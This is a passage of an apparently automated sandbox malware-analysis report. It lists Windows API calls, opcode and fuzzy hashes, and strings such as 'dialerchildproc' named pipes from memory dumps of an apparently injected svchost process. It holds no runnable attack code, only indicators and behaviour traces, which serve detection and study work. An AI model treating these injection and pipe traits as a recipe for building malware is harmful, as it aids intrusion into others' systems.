                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001F28C93CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001F28C93ECCC,?,?,?,?,000001F28C93BF9F,?,?,?,?,?,000001F28C937AB0), ref: 000001F28C93CF2C
                                                                            • Part of subcall function 000001F28C93D6CC: HeapAlloc.KERNEL32 ref: 000001F28C93D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF54
                                                                            • Part of subcall function 000001F28C93D744: HeapFree.KERNEL32 ref: 000001F28C93D75A
                                                                            • Part of subcall function 000001F28C93D744: GetLastError.KERNEL32 ref: 000001F28C93D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F28C940A6B,?,?,?,000001F28C94045C,?,?,?,000001F28C93C84F), ref: 000001F28C93CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: c1dccc9a58c3acbe364e99b3de5aaac7dedc88dfaa24f6078136831367b18d4b
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 274149713C1EC782FA68A73159553FA22C25B84BF4F2C27B4E836076E6EF3998018200

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: 57cb264d3990d0bdc8e496bdce57bc45f54469c11ba177c15f029bb998e39be8
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: BE213876658E82C2EB209B25F4443BA67E0F789BE5F544265EA5907AA8DF3CC149CB00

                                                                          Control-flow Graph

                                                                          (control-flow graph of the function at 1f28c1d9944, internal calls only; graph data omitted)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: a9609446f00a766f3d3b655ef47b5d2ff7605ba4997714f758606ca2dc9d6f4c
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 38E15672644F828AEB609F65E4803ED7BE0F755BD8F104125EB8957B9ACF38E491C740

                                                                          Control-flow Graph

                                                                          (control-flow graph of the function at 1f28c93a544, internal calls only; graph data omitted)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181